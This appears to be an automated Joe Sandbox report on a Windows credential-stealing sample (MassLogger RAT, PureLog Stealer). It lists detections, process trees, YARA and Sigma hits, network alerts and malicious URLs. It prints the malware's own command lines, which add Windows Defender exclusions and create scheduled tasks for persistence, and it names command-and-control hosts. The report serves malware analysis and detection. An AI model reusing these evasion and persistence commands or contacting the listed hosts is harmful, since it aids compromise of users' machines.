Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#_1100015533.scr

Overview

General Information

Sample name:PO#_1100015533.scr
Analysis ID:1591772
MD5:ac9d898648d7b851bbccb6f6028d45c6
SHA1:82379e0b59f9a08c7196897a09be3ae859ec498a
SHA256:6f9d6ab9fccd1087337ed8328407e5918bd3e2cddef4e4c4b56b067e956ac0d2
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Drops large PE files
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for Windows Mail specific files
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates or modifies windows services
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • PO#_1100015533.scr (PID: 3260 cmdline: "C:\Users\user\Desktop\PO#_1100015533.scr" /S MD5: AC9D898648D7B851BBCCB6F6028D45C6)
    • powershell.exe (PID: 3356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • PO#_1100015533.scr (PID: 3632 cmdline: "C:\Users\user\Desktop\PO#_1100015533.scr" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • Trading_AIBot.exe (PID: 3752 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 3996 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 4020 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • apihost.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 46981F20592CA1EB36C2C21E396551EC)
      • Microsofts.exe (PID: 3800 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • taskeng.exe (PID: 3656 cmdline: taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • hVVSnrrP.exe (PID: 3720 cmdline: C:\Users\user\AppData\Roaming\hVVSnrrP.exe MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • powershell.exe (PID: 3036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 1884 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • hVVSnrrP.exe (PID: 772 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 2556 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
  • armsvc.exe (PID: 3728 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 096F8412E89BED51F0B5E63CFDD50EDA)
  • alg.exe (PID: 3884 cmdline: C:\Windows\System32\alg.exe MD5: 194D43897AB889D24B26961F99059037)
  • aspnet_state.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe MD5: E77E152A4018445F2DBB4277C818FAEC)
  • ehrecvr.exe (PID: 3300 cmdline: C:\Windows\ehome\ehRecvr.exe MD5: 045A70B9D4D84B036CE87DE912F44EAD)
  • ehsched.exe (PID: 3588 cmdline: C:\Windows\ehome\ehsched.exe MD5: 0D46082BE032D7DA3EE657EA6CE0C32D)
  • FXSSVC.exe (PID: 3560 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5F010917F62C2D56F7B242050E3524D7)
  • ieetwcollector.exe (PID: 3356 cmdline: C:\Windows\system32\IEEtwCollector.exe /V MD5: BF5F5556930D8CEF7BBAC46115910CF1)
  • maintenanceservice.exe (PID: 2164 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 5834C05D84CD41A0A0D4619A6C0CB933)
  • msdtc.exe (PID: 1488 cmdline: C:\Windows\System32\msdtc.exe MD5: 48149FCDFB3E1B695AD17C25A00F9901)
  • msiexec.exe (PID: 4060 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 0B127B7A1AB570F72488585B52FA0F77)
  • perfhost.exe (PID: 2476 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 11D691ADAD67DBAC861DB2471CE9028B)
  • Locator.exe (PID: 3336 cmdline: C:\Windows\system32\locator.exe MD5: 860030B06B83DAD907D4E0801AB228F9)
  • snmptrap.exe (PID: 3292 cmdline: C:\Windows\System32\snmptrap.exe MD5: BD9A4418F0BB9873B642B4914A4BCFC8)
  • vds.exe (PID: 3548 cmdline: C:\Windows\System32\vds.exe MD5: 39BE2351CC35C279474F5941C10A602A)
  • wbengine.exe (PID: 2860 cmdline: "C:\Windows\system32\wbengine.exe" MD5: FCD24DD63126C9B5BC420BF92FA39456)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x101cd:$a1: get_encryptedPassword
        • 0x10509:$a2: get_encryptedUsername
        • 0xff5a:$a3: get_timePasswordChanged
        • 0x1007b:$a4: get_passwordField
        • 0x101e3:$a5: set_encryptedPassword
        • 0x11bb3:$a7: get_logins
        • 0x11864:$a8: GetOutlookPasswords
        • 0x11642:$a9: StartKeylogger
        • 0x11b03:$a10: KeyLoggerEventArgs
        • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 18 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3752, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, ProcessId: 4020, ProcessName: schtasks.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Local\Temp\Microsofts.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", ProcessId: 3488, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3356, TargetFilename: C:\Users\user\AppData\Local\Temp\mmq5rtk3.bzo.ps1

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", ProcessId: 3488, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:15.987935+010020516491A Network Trojan was detected192.168.2.22564758.8.8.853UDP
                  2025-01-15T12:57:50.144218+010020516491A Network Trojan was detected192.168.2.22505688.8.8.853UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:12.878703+010020516481A Network Trojan was detected192.168.2.22527818.8.8.853UDP
                  2025-01-15T12:57:47.254510+010020516481A Network Trojan was detected192.168.2.22605078.8.8.853UDP
                  2025-01-15T12:58:21.044344+010020516481A Network Trojan was detected192.168.2.22594478.8.8.853UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:51.628338+010020181411A Network Trojan was detected18.141.10.10780192.168.2.2249182TCP
                  2025-01-15T12:58:20.480766+010020181411A Network Trojan was detected54.244.188.17780192.168.2.2249188TCP
                  2025-01-15T12:58:46.657220+010020181411A Network Trojan was detected47.129.31.21280192.168.2.2249195TCP
                  2025-01-15T12:58:48.207200+010020181411A Network Trojan was detected13.251.16.15080192.168.2.2249196TCP
                  2025-01-15T12:58:53.957588+010020181411A Network Trojan was detected34.246.200.16080192.168.2.2249204TCP
                  2025-01-15T12:58:54.504326+010020181411A Network Trojan was detected34.227.7.13880192.168.2.2249206TCP
                  2025-01-15T12:58:57.376908+010020181411A Network Trojan was detected44.221.84.10580192.168.2.2249211TCP
                  2025-01-15T12:58:59.225917+010020181411A Network Trojan was detected35.164.78.20080192.168.2.2249213TCP
                  2025-01-15T12:58:59.720208+010020181411A Network Trojan was detected3.94.10.3480192.168.2.2249214TCP
                  2025-01-15T12:59:02.787886+010020181411A Network Trojan was detected18.246.231.12080192.168.2.2249217TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:51.628338+010020377711A Network Trojan was detected18.141.10.10780192.168.2.2249182TCP
                  2025-01-15T12:58:20.480766+010020377711A Network Trojan was detected54.244.188.17780192.168.2.2249188TCP
                  2025-01-15T12:58:46.657220+010020377711A Network Trojan was detected47.129.31.21280192.168.2.2249195TCP
                  2025-01-15T12:58:48.207200+010020377711A Network Trojan was detected13.251.16.15080192.168.2.2249196TCP
                  2025-01-15T12:58:53.957588+010020377711A Network Trojan was detected34.246.200.16080192.168.2.2249204TCP
                  2025-01-15T12:58:54.504326+010020377711A Network Trojan was detected34.227.7.13880192.168.2.2249206TCP
                  2025-01-15T12:58:57.376908+010020377711A Network Trojan was detected44.221.84.10580192.168.2.2249211TCP
                  2025-01-15T12:58:59.225917+010020377711A Network Trojan was detected35.164.78.20080192.168.2.2249213TCP
                  2025-01-15T12:58:59.720208+010020377711A Network Trojan was detected3.94.10.3480192.168.2.2249214TCP
                  2025-01-15T12:59:02.787886+010020377711A Network Trojan was detected18.246.231.12080192.168.2.2249217TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:44.372540+010020349831A Network Trojan was detected192.168.2.224917554.244.188.17780TCP
                  2025-01-15T12:58:13.044911+010020349831A Network Trojan was detected192.168.2.224918382.112.184.19780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:57:11.148650+010028032742Potentially Bad Traffic192.168.2.2249166193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T12:58:55.969486+010028508511Malware Command and Control Activity Detected192.168.2.224919482.112.184.19780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: PO#_1100015533.scrAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Avira URL Cloud: Label: malware
                  Source: http://54.244.188.177/rmrhacpxAvira URL Cloud: Label: malware
                  Source: http://ww7.przvgke.biz/Avira URL Cloud: Label: malware
                  Source: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459Avira URL Cloud: Label: malware
                  Source: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400Avira URL Cloud: Label: phishing
                  Source: http://54.244.188.177/crsFLLcpAvira URL Cloud: Label: malware
                  Source: http://54.244.188.177/rmrhacpxLAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640CbAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccepAvira URL Cloud: Label: malware
                  Source: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OWAvira URL Cloud: Label: phishing
                  Source: http://54.244.188.177/crsAvira URL Cloud: Label: malware
                  Source: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613Avira URL Cloud: Label: phishing
                  Antivirus detection for dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeAvira: detection malicious, Label: HEUR/AGEN.1311126
                  Source: C:\Windows\System32\SearchIndexer.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: C:\Windows\System32\VSSVC.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\System32\FXSSVC.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files\Windows Media Player\wmpnetwk.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\System32\Locator.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\SysWOW64\perfhost.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeReversingLabs: Detection: 21%
                  Multi AV Scanner detection for submitted file
                  Source: PO#_1100015533.scrVirustotal: Detection: 31%Perma Link
                  Source: PO#_1100015533.scrReversingLabs: Detection: 21%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeJoe Sandbox ML: detected
                  Source: C:\Windows\System32\SearchIndexer.exeJoe Sandbox ML: detected
                  Source: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeJoe Sandbox ML: detected
                  Source: C:\Windows\System32\VSSVC.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJoe Sandbox ML: detected
                  Source: C:\Windows\System32\FXSSVC.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files\Windows Media Player\wmpnetwk.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJoe Sandbox ML: detected
                  Source: C:\Windows\System32\Locator.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\perfhost.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
